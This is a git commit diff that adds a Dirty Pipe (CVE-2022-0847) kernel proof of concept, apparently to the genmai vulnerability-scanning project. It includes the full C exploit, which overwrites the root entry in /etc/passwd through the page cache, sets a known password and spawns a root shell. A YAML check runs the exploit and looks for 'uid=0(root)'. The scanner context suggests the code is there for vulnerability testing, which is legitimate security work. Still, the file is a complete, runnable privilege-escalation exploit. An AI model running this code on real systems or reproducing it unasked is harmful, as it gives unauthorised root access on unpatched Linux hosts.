Merge branch 'master' of gitee.com:openkylin/genmai into Feat_Add_CVE_2022_2274

Signed-off-by: D1aoBoom <xionggaojian@buaa.edu.cn>

data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c

@@ -0,0 +1,179 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Copyright 2022 CM4all GmbH / IONOS SE
+ *
+ * author: Max Kellermann <max.kellermann@ionos.com>
+ *
+ * Proof-of-concept exploit for the Dirty Pipe
+ * vulnerability (CVE-2022-0847) caused by an uninitialized
+ * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
+ * file contents in the page cache, even if the file is not permitted
+ * to be written, immutable or on a read-only mount.
+ *
+ * This exploit requires Linux 5.8 or later; the code path was made
+ * reachable by commit f6dd975583bd ("pipe: merge
+ * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
+ * there before, it just provided an easy way to exploit it.
+ *
+ * There are two major limitations of this exploit: the offset cannot
+ * be on a page boundary (it needs to write one byte before the offset
+ * to add a reference to this page to the pipe), and the write cannot
+ * cross a page boundary.
+ *
+ * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
+ *
+ * Further explanation: https://dirtypipe.cm4all.com/
+ */
+
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/user.h>
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 4096
+#endif
+
+/**
+ * Create a pipe where all "bufs" on the pipe_inode_info ring have the
+ * PIPE_BUF_FLAG_CAN_MERGE flag set.
+ */
+static void prepare_pipe(int p[2])
+{
+	if (pipe(p)) abort();
+
+	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
+	static char buffer[4096];
+
+	/* fill the pipe completely; each pipe_buffer will now have
+	   the PIPE_BUF_FLAG_CAN_MERGE flag */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		write(p[1], buffer, n);
+		r -= n;
+	}
+
+	/* drain the pipe, freeing all pipe_buffer instances (but
+	   leaving the flags initialized) */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		read(p[0], buffer, n);
+		r -= n;
+	}
+
+	/* the pipe is now empty, and if somebody adds a new
+	   pipe_buffer without initializing its "flags", the buffer
+	   will be mergeable */
+}
+
+int main() {
+	const char *const path = "/etc/passwd";
+
+        printf("Backing up /etc/passwd to /tmp/passwd.bak ...\n");
+        FILE *f1 = fopen("/etc/passwd", "r");
+        FILE *f2 = fopen("/tmp/passwd.bak", "w");
+
+        if (f1 == NULL) {
+            printf("Failed to open /etc/passwd\n");
+            exit(EXIT_FAILURE);
+        } else if (f2 == NULL) {
+            printf("Failed to open /tmp/passwd.bak\n");
+            fclose(f1);
+            exit(EXIT_FAILURE);
+        }
+
+        char c;
+        while ((c = fgetc(f1)) != EOF)
+            fputc(c, f2);
+
+        fclose(f1);
+        fclose(f2);
+
+	loff_t offset = 4; // after the "root"
+	const char *const data = ":$1$antx-soc$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/sh\n"; // openssl passwd -1 -salt antx-soc antx-soc
+        printf("Setting root password to \"antx-soc\"...\n");
+	const size_t data_size = strlen(data);
+
+	if (offset % PAGE_SIZE == 0) {
+		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
+		return EXIT_FAILURE;
+	}
+
+	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
+	const loff_t end_offset = offset + (loff_t)data_size;
+	if (end_offset > next_page) {
+		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
+		return EXIT_FAILURE;
+	}
+
+	/* open the input file and validate the specified offset */
+	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
+	if (fd < 0) {
+		perror("open failed");
+		return EXIT_FAILURE;
+	}
+
+	struct stat st;
+	if (fstat(fd, &st)) {
+		perror("stat failed");
+		return EXIT_FAILURE;
+	}
+
+	if (offset > st.st_size) {
+		fprintf(stderr, "Offset is not inside the file\n");
+		return EXIT_FAILURE;
+	}
+
+	if (end_offset > st.st_size) {
+		fprintf(stderr, "Sorry, cannot enlarge the file\n");
+		return EXIT_FAILURE;
+	}
+
+	/* create the pipe with all flags initialized with
+	   PIPE_BUF_FLAG_CAN_MERGE */
+	int p[2];
+	prepare_pipe(p);
+
+	/* splice one byte from before the specified offset into the
+	   pipe; this will add a reference to the page cache, but
+	   since copy_page_to_iter_pipe() does not initialize the
+	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
+	--offset;
+	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
+	if (nbytes < 0) {
+		perror("splice failed");
+		return EXIT_FAILURE;
+	}
+	if (nbytes == 0) {
+		fprintf(stderr, "short splice\n");
+		return EXIT_FAILURE;
+	}
+
+	/* the following write will not create a new pipe_buffer, but
+	   will instead write into the page cache, because of the
+	   PIPE_BUF_FLAG_CAN_MERGE flag */
+	nbytes = write(p[1], data, data_size);
+	if (nbytes < 0) {
+		perror("write failed");
+		return EXIT_FAILURE;
+	}
+	if ((size_t)nbytes < data_size) {
+		fprintf(stderr, "short write\n");
+		return EXIT_FAILURE;
+	}
+
+	char *argv[] = {"/bin/sh", "-c", "(echo antx-soc; cat) | su - -c \""
+                "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";"
+                "cp /tmp/passwd.bak /etc/passwd;"
+                "echo \\\"Done! Popping shell... (run commands now)\\\";"
+                "/bin/sh;"
+            "\" root"};
+        execv("/bin/sh", argv);
+
+        printf("system() function call seems to have failed :(\n");
+	return EXIT_SUCCESS;
+}

data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml

@@ -0,0 +1,38 @@
+FormatVer: 20230308
+Id: CVE-2022-0847
+Belong: kernel
+PocHazardLevel: high
+Source: https://github.com/antx-code/CVE-2022-0847
+SiteInfo:
+    Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
+    Severity: high
+    Description:
+        DirtyPipe是自 内核版本5.8 以来 Linux 内核中的一个漏洞，允许覆盖任意只读文件中的数据。这会导致特权提升，因为非特权进程可以将代码注入根进程。
+    ScopeOfInfluence:
+        Linux kernel < 5.17-rc6.
+    References:
+        - https://nvd.nist.gov/vuln/detail/cve-2022-0847
+        - https://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html
+    SiteClassification:
+        CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+        CvssScore: 7.8
+        CveId: CVE-2022-0847
+        CweId: CWE-665, CWE-281
+        CnvdId: None
+        KveId: None
+    Tags:
+        - 权限提升
+SiteRequests:
+    Implement: 
+        ImArray:
+            - inter:
+              InterArgs :    
+              Exec : CVE-2022-0847
+              Args :
+        ExpireTime: 30
+        Inter:
+            - ">.:>>"
+            - "<<:id\n"
+            - ">.:\n"
+            - ">?:uid=0(root)"
+        Condition: None

data/KernelPocs/KernelPocs.yaml

@@ -4,3 +4,4 @@ ExplorerItems:
     - ConfigFile: CVE-2021-22555/CVE-2021-22555.yaml
     - ConfigFile: CVE-2022-2588/CVE-2022-2588.yaml
     - ConfigFile: CVE-2022-2639/CVE-2022-2639.yaml
+    - ConfigFile: CVE-2022-0847/CVE-2022-0847.yaml